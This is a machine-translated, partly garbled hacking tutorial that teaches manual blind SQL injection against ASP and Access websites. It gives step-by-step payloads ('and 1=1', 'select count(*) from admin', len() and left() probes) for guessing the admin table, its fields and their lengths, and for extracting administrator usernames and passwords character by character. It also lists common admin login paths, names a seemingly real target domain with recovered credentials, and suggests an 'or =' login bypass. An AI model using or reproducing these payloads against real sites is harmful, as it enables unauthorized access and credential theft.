* ** Injection basics ** (mainly manual and basic ~ Haha)
Instance: http://www.XXX.com/jiaren.asp? ID = 544
Okay. Now we start .....
1. Judgment
Use;
Use and 1 = 1 and 1 = 2
Judgment is very important and the most important step, because if you do not know how to continue with manual injection ..
========================================================== ==========================================
Return
Microsoft JET Database Engine error 80040e14
Syntax error (operator loss) in the query expression ID = 544.
/Jiaren. asp, row 15
========================================================== ==========================================
; Returns the normal page
====================================
And 1 = 1 return to the normal page
======================================
And 1 = 2 Return Error Page
No:
ADODB. Field error 800a0bcd
Either BOF or EOF is "true", or the current record has been deleted. The operation required requires a current record.
/Jiaren. asp, row 28
========================================================== ==============================================
We made a simple judgment above to know that the page has been injected. at this time, many friends will ask why there is injection. you only need to remember that we are judged by the difference in the returned page. only when the two returned pages are different can we know that they exist.
2. Guess the table
And 0 <> (select count (*) from *)
This is the most basic query statement in the most common sense. I will explain it to you as to the function of the statement. However, please refer to relevant SQL query information for details.
And 0 <> (select count (*) from admin) --- determine whether the admin table exists
Here, admin can be changed. Do not change other parts.
The correct page we just returned indicates that the admin table exists. if the returned error description does not exist, we need to change it to another one. for example, and 0 <> (select count (*) from user). Of course, you can try it as long as you think of it. I gave you two tips in my class that day. I didn't expect many people to know them. I also asked if I could change admin and user to another one. comrades, this admin user can be replaced. however, you don't need to change the name of a table. because you are guessing a table, you also need to think about it. is it useful to change to 123 456. no, because no one will use this table name.
Generally, the table name is nothing more than admin adminuser user pass password ..
3. Guess the number of accounts
And 0 <(select count (*) from admin)
It is similar to the preceding statement. in fact, the query part is the same. The difference is the preceding number. this number is used to check the number of user accounts. yes. not fixed: 1 .. because we guess. that is, we do not know whether there are several accounts in the data in the table, so we have to guess. If it is fixed, we will not guess it ..
1 <that is to say, check if 1 is less than the number of accounts in it. If the returned page is correct, it is correct, if the error description is not, we need to replace it with 2 <3 <..... you can also use 1> 2> to guess.
If 0 is returned, the correct page is returned. 1 is returned. The error page indicates that the number of accounts is a specific number of mathematical indicators. I will not tell you how to determine the size.
Here I will show you, here I am judging from 0, and will definitely return the correct page because it is impossible for an administrator account to have none. an error is returned. it only has one administrator account. let's change to 1 = To see if OK is returned. The correct page indicates yes.
If there are several accounts, you need to know which account to guess.
4. Name of the field to be guessed
And 1 = (select count (*) from admin where len (name)> 0) User field name
And 1 = (select count (*) from admin where len (password)> 0) password field name
The name of the field in the table is guessed.
And 1 = (select count (*) from admin where len (*)> 0) --- this is the core statement. all we need to do is add the field name that we think of in len () brackets.
Let's first guess the username field. I used name OK, right, so let's guess the password field.
I first use pass to get dizzy, so we can switch to password to see if OK is correct.
Then we can guess the user field and password field. below is the length and specific characters of the guess.
5. Guess the length of each field
To guess the length
And 1 = (select count (*) from admin where len (*)> 0)
> Replace 0 with another one? Return to the correct page. OK. Let's get started.
The first is the account length... the account field is name.
And 1 = (select count (*) from admin where len (name)> 0) Correct
And 1 = (select count (*) from admin where len (name)> 1) Correct
And 1 = (select count (*) from admin where len (name)> 2) Correct
And 1 = (select count (*) from admin where len (name)> 6) Error
And 1 = (select count (*) from admin where len (name)> 5) Correct
And 1 = (select count (*) from admin where len (name)> 4) Correct
Then we can know that the length is 6.
And 1 = (select count (*) from admin where len (name) = 6) Correct
Right. = 6. The returned page is the correct page.
Below is the length of the password field
And 1 = (select count (*) from admin where len (password)> 0) Correct
And 1 = (select count (*) from admin where len (password)> 6) Correct
And 1 = (select count (*) from admin where len (password)> 10) Correct
And 1 = (select count (*) from admin where len (password)> 15) Error
And 1 = (select count (*) from admin where len (password)> 14) Error
And 1 = (select count (*) from admin where len (password)> 13) Error
And 1 = (select count (*) from admin where len (password)> 12) Error
And 1 = (select count (*) from admin where len (password)> 11) Correct
The OK length is 12.
Name 6
Password 12
And the following are the specific characters.
6. escape characters
And 1 = (select count (*) from admin where left (name, 1) = a) --- guess the user
And 1 = (select count (*) from admin where left (password, 1) =)
In this way, you can add a character to guess the number of digits you have just guessed. Even if the account has come out
And 1 = (select count (*) from admin where left (pass, 1) = a) --- guess the password
Left (name, 1) = a note that the position 1 is the location of the characters to be guessed.
And 1 = (select count (*) from admin where left (name, 1) = a) --- guesses the first place of the user account
And 1 = (select count (*) from admin where left (name, 2) = AB) --- second place of the user account
In this way, you only need to guess.
And 1 = (select count (*) from admin where left (name, 1) = a) Error
.....
And 1 = (select count (*) from admin where left (name, 6) = pclzyq)
Because the process of this guess is long, I will give the answer directly.
And 1 = (select count (*) from admin where left (password, 1) = a) Error
.......
And 1 = (select count (*) from admin where left (password, 12) = pclzyq000215)
The answer is provided directly.
Name = pclzyq
Password = pclzyq000215
7. Find the login port and log on
General logon Port:
Admin. asp
Admin_index.asp
Admin/index. asp
Admin/admin. asp
....
You can accumulate it by yourself. Don't forget to make it into a text file and send it to me.
Here we login port is under the http://www.talewin.com/admin.asp is login.
Well, it's easy to write the program in the background, probably because there is another problem with the login port.
Use or = to log in and see if you have seen it.
Note:
Command: SELECT
Meaning: select
Description: Used to find qualified records
Total addition function: COUNT
Quantity
Description: used to calculate the specified quantity.
Clause: FROM
Data Table
Description: used to specify a data table.
Clause: WHERE
Condition
Description: Used to set conditions.
Operator: AND
And
Description: logical and
TOP -- extract the previous data with the specified length
Select top 10 * from .....
And 1 = (select top 1 count (*) from Admin where Asc (mid (pass, 5, 1) = 51) -- this query statement can be used to guess Chinese users and passwords. you only need to replace the following number with the Chinese ASSIC code. finally, convert the result to a character.